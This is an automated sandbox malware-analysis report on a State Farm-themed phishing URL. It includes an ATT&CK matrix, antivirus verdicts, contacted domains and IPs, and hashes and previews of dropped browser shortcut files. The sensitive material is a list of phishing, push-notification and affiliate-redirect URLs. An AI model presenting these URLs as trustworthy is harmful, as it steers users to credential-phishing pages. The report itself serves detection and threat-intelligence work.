              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid AccountsWindows Management Instrumentation1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              11
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
              Non-Application Layer Protocol
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
              Application Layer Protocol
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication1
              Ingress Tool Transfer
              Data DestructionVirtual Private ServerEmployee Names
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html0%Avira URL Cloudsafe
              https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html1%VirustotalBrowse
              https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html100%SlashNextFraudulent Website type: Phishing & Social Engineering
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              govwlfeloony.com1%VirustotalBrowse
              svylst.com0%VirustotalBrowse
              pushrev.neptuneadspush.com0%VirustotalBrowse
              www.govwlfeloony.com0%VirustotalBrowse
              pushlite.neptuneadspush.com0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://pushrev.neptuneadspush.com/javascripts/trackpush-v2-cm.js0%Avira URL Cloudsafe
              https://sofa.thriveuniversehq.com/people/5.jpg100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/people/1.jpg100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/people/4.jpg100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/assets/images/state-farm-drake-2021.jpg100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/assets/bootstrap/dist/css/bootstrap.min.css100%Avira URL Cloudphishing
              https://pushrev.neptuneadspush.com/javascripts/trackpush-v2-cm.js0%VirustotalBrowse
              https://sofa.thriveuniversehq.com/utils/banners/images/2023-months/2023-11.png?v=1100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/assets/images/State-Farm-Logo.png100%Avira URL Cloudphishing
              https://www.govwlfeloony.com/2FRNJG5BQ/GZHBQPR/0%Avira URL Cloudsafe
              https://sofa.thriveuniversehq.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/service_worker.js100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.ico100%Avira URL Cloudphishing
              https://svylst.com/favicon.ico0%Avira URL Cloudsafe
              https://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=&view=fb31fd86985514de1142f2f6b3bcea13_00%Avira URL Cloudsafe
              https://sofa.thriveuniversehq.com/people/3.jpg100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/assets/js/scripts-w14-t-f-qc-v2-fst-ri.js?v=5.40&cc=us100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/favicon.ico100%Avira URL Cloudphishing
              https://pushlite.neptuneadspush.com0%Avira URL Cloudsafe
              https://www.govwlfeloony.com/2FRNJG5BQ/GZHBQPR/0%VirustotalBrowse
              https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v10%Avira URL Cloudsafe
              https://pushlite.neptuneadspush.com0%VirustotalBrowse
              http://getbootstrap.com)0%Avira URL Cloudsafe
              http://svylst.com/favicon.ico0%Avira URL Cloudsafe
              https://sofa.thriveuniversehq.com/assets/js/mobile-detect.js-master/mobile-detect.min.js100%Avira URL Cloudphishing
              http://svylst.com/js/ads.js0%Avira URL Cloudsafe
              https://sofa.thriveuniversehq.com/assets/bootstrap/dist/js/bootstrap.min.js100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/js/fingerprintjs2/1.5.0/fingerprint2.min.js100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/manifest.json100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/people/2.jpg100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/utils/banners/banner-bf.js?v=1.04100%Avira URL Cloudphishing
              https://sofa.thriveuniversehq.com/assets/js/ads.js100%Avira URL Cloudphishing
              http://svylst.com/favicon.ico0%VirustotalBrowse
              https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v10%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              govwlfeloony.com
              38.62.240.122
              truefalseunknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                accounts.google.com
                172.253.63.84
                truefalse
                  high
                  svylst.com
                  104.21.78.140
                  truefalseunknown
                  www.google.com
                  142.251.167.104
                  truefalse
                    high
                    clients.l.google.com
                    142.251.179.100
                    truefalse
                      high
                      sofa.thriveuniversehq.com
                      104.21.1.7
                      truefalse
                        unknown
                        stun.l.google.com
                        142.250.112.127
                        truefalse
                          high
                          pushlite.neptuneadspush.com
                          172.64.100.6
                          truefalseunknown
                          pushrev.neptuneadspush.com
                          172.64.100.6
                          truefalseunknown
                          clients1.google.com
                          unknown
                          unknownfalse
                            high
                            www.govwlfeloony.com
                            unknown
                            unknownfalseunknown
                            clients2.google.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://sofa.thriveuniversehq.com/people/5.jpgfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://pushrev.neptuneadspush.com/javascripts/trackpush-v2-cm.jsfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://sofa.thriveuniversehq.com/s3/terms/terms.phpfalse
                                unknown
                                https://sofa.thriveuniversehq.com/people/1.jpgfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                  high
                                  https://www.google.com/images/icons/product/cloud_storage-32.pngfalse
                                    high
                                    https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000061077E5FEEfalse
                                      high
                                      http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=false
                                        unknown
                                        https://sofa.thriveuniversehq.com/people/4.jpgfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://sofa.thriveuniversehq.com/assets/images/state-farm-drake-2021.jpgfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://sofa.thriveuniversehq.com/assets/bootstrap/dist/css/bootstrap.min.cssfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://sofa.thriveuniversehq.com/utils/banners/images/2023-months/2023-11.png?v=1false
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://sofa.thriveuniversehq.com/assets/images/State-Farm-Logo.pngfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://svylst.com/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.phpfalse
                                          unknown
                                          https://www.govwlfeloony.com/2FRNJG5BQ/GZHBQPR/false
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://sofa.thriveuniversehq.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.icofalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://sofa.thriveuniversehq.com/s3/terms/terms.phpfalse
                                            unknown
                                            https://sofa.thriveuniversehq.com/assets/js/scripts-w14-t-f-qc-v2-fst-ri.js?v=5.40&cc=usfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://sofa.thriveuniversehq.com/service_worker.jsfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://a.nel.cloudflare.com/report/v3?s=Ql%2F6%2FLhK%2FE2hXSOr%2BqV4blrmcGlD02a1U%2F55F1JbgXvJQAeddoeC9W1HGdHeKvrQ%2FVYniGYcZ6ZfdWwCWjxbAp2TdfnO1rgq%2FGnUYJh1k1uSp5cozt3jMi0nUiZLEcy8wjm0fhpzFn6Mg3pGfalse
                                              high
                                              https://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=&view=fb31fd86985514de1142f2f6b3bcea13_0false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sofa.thriveuniversehq.com/people/3.jpgfalse
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://sofa.thriveuniversehq.com/favicon.icofalse
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v1false
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://svylst.com/favicon.icofalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sofa.thriveuniversehq.com/assets/js/mobile-detect.js-master/mobile-detect.min.jsfalse
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                                                high
                                                http://svylst.com/js/ads.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sofa.thriveuniversehq.com/assets/bootstrap/dist/js/bootstrap.min.jsfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://sofa.thriveuniversehq.com/js/fingerprintjs2/1.5.0/fingerprint2.min.jsfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=false
                                                  unknown
                                                  https://sofa.thriveuniversehq.com/manifest.jsonfalse
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.phpfalse
                                                    unknown
                                                    https://sofa.thriveuniversehq.com/people/2.jpgfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://sofa.thriveuniversehq.com/utils/banners/banner-bf.js?v=1.04false
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://sofa.thriveuniversehq.com/assets/js/ads.jsfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://www.loc.gov/copyrightchromecache_125.2.drfalse
                                                      high
                                                      https://pushlite.neptuneadspush.comchromecache_100.2.drfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://getbootstrap.com)chromecache_129.2.dr, chromecache_119.2.drfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_119.2.drfalse
                                                        high
                                                        https://github.com/hgoebl/mobile-detect.jschromecache_128.2.drfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.112.127
                                                          stun.l.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          38.62.240.122
                                                          govwlfeloony.comUnited States
                                                          174COGENT-174USfalse
                                                          172.253.63.84
                                                          accounts.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.251.167.104
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.253.122.102
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.251.163.105
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.21.78.140
                                                          svylst.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          142.251.179.100
                                                          clients.l.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.67.151.183
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          172.64.100.6
                                                          pushlite.neptuneadspush.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          35.190.80.1
                                                          a.nel.cloudflare.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.253.62.106
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.21.1.7
                                                          sofa.thriveuniversehq.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          IP
                                                          192.168.2.5
                                                          Joe Sandbox Version:38.0.0 Ammolite
                                                          Analysis ID:1348255
                                                          Start date and time:2023-11-27 04:22:52 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 3m 40s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:browseurl.jbs
                                                          Sample URL:https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal72.phis.win@26/47@37/15
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Browse: https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          • Browse: https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          • Browse: https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          • Browse: https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          • Browse: https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 172.253.62.94, 34.104.35.123, 142.251.16.207, 142.251.163.207, 172.253.63.207, 172.253.115.207, 142.251.167.207, 142.251.179.207, 172.253.62.207, 172.253.122.207, 142.251.111.95, 172.253.115.95, 142.251.16.94, 172.253.62.95, 142.251.16.95, 172.253.63.95, 172.253.122.95, 142.251.167.95, 142.251.179.95, 142.251.163.95, 142.250.31.95, 69.164.0.0, 67.26.245.254, 192.229.211.108
                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, storage.googleapis.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com
                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          No simulations
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 27 02:23:40 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):3.9770963435428595
                                                          Encrypted:false
                                                          SSDEEP:48:8JbdWTSqxEHSidAKZdA19ehwiZUklqehgy+3:8J8Pxh3y
                                                          MD5:3DF5C19C25ED46556665D067BABBFB45
                                                          SHA1:533990DA6DB903B2AFA8139A9FAE95EDD587362C
                                                          SHA-256:92D819D51A4EAAEEF6E5F0E4CEAF9B1D45469EA15A1CCB1D3931DAC0C9471BF9
                                                          SHA-512:AC14D6A987C28DE1260C7A1E1CBD065CF8454B4349F72D3C051C68D9027904C63B249C92E973BC9D46F3487E8E6967CAA658704B4DEEA26104928107856CC70D
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:L..................F.@.. ...$+.,....^.5.. ..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I{W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._~.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 27 02:23:40 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2679
                                                          Entropy (8bit):3.989804339606055
                                                          Encrypted:false
                                                          SSDEEP:48:8LdWTSqxEHSidAKZdA1weh/iZUkAQkqehny+2:8sPxT9QKy
                                                          MD5:72D8F47B09BBA9B708FE98456A291D1E
                                                          SHA1:D9F890F55F108A05EBC83FD017D5260F01E2E7CF
                                                          SHA-256:8B6BA83EB3AC0E6E33032A679DEC31C96C4684BF8853268F33804945CB695707
                                                          SHA-512:24C56E9B89F01F6C4A1DBD4BF3888C7149C576A05CC542DC0A8557B8255346D839CB3EC93171950D8964957E4956CDE2344AD4788D9116353EBF6C88E7BCED9F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:L..................F.@.. ...$+.,.... U(.. ..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I{W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._~.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2693
                                                          Entropy (8bit):4.003407554303211
                                                          Encrypted:false
                                                          SSDEEP:48:8xbdWTSqsHSidAKZdA14tseh7sFiZUkmgqeh7sBy+BX:8x8P7nzy
                                                          MD5:DCFA6FF1C2B091DE079D2087D88E48F3
                                                          SHA1:6EFFB0FC3F5D3064D963CEB6ED764E5755057BCB
                                                          SHA-256:595ABC564AFFFD21AB3F7341C265FF76122FAB12207346A8A2335D319E7CADCE
                                                          SHA-512:F4D1A888C6EFD99FF9FC81F43A744B43BF8A83ADD98C5D84BF60B88C0FED096A4EEF35B7739B1607D4573781564562F486ECDA0CF55E05A4EE463034C66D2AF9
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I{W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._~.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 27 02:23:40 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2681
                                                          Entropy (8bit):3.9920148017229775
                                                          Encrypted:false
                                                          SSDEEP:48:8rTdWTSqxEHSidAKZdA1vehDiZUkwqehby+R:8rEPxQpy
                                                          MD5:5C294DC3DB6C65B3FB84AEB547DBCB86
                                                          SHA1:533E341B71992EBD74822CDBC6A1D92F3BB978BD
                                                          SHA-256:9660067DCC05F66170126AFA89443656D271079AE4E9E7B038865DA965CCFEED
                                                          SHA-512:C53CC5CE3A3423D261D9A5B2DE36DAF15B939775C024D69BFE71C16D6112B35EA7206F11C081F2AA66ED75FE842D152778C78A2321F88366833EE1A80B8E17BB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:L..................F.@.. ...$+.,......".. ..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I{W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._~.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 27 02:23:40 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2681
                                                          Entropy (8bit):3.97845812174865
                                                          Encrypted:false
                                                          SSDEEP:48:8X+vdWTSqxEHSidAKZdA1hehBiZUk1W1qehty+C:8O4PxQ9Ny
                                                          MD5:87616E9491808F31CD2715A338D3A803
                                                          SHA1:402B65C84E41A0315713B8BC04FEB6E315E87C6D
                                                          SHA-256:9F9F90CC0B040DFBFA452880D1C3C0883A429444AA4DEB64A5C5984D1BB22A08
                                                          SHA-512:C6F5744BAF54F1362738A08D213D42D074DE9264684973EAA67D67E29E062C83F53CE6C2F279C4F7D9BCE5D39AE49294C03A253106D10A0E607D3C5BF089A594
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:L..................F.@.. ...$+.,.....c0.. ..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I{W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._~.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 27 02:23:40 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2683
                                                          Entropy (8bit):3.9900108482817798
                                                          Encrypted:false
                                                          SSDEEP:48:8TdWTSqxEHSidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbzy+yT+:8EPxeT/TbxWOvTbzy7T
                                                          MD5:2A268D32535C1DE2316A002E4BB91206
                                                          SHA1:4D550A389FFDEB2C08151FCF1AB95223958A5F5A
                                                          SHA-256:9F61881BDED7BEE30214B4E0A077226ACB68761F7FDDB3DBE13B3162B53DAC66
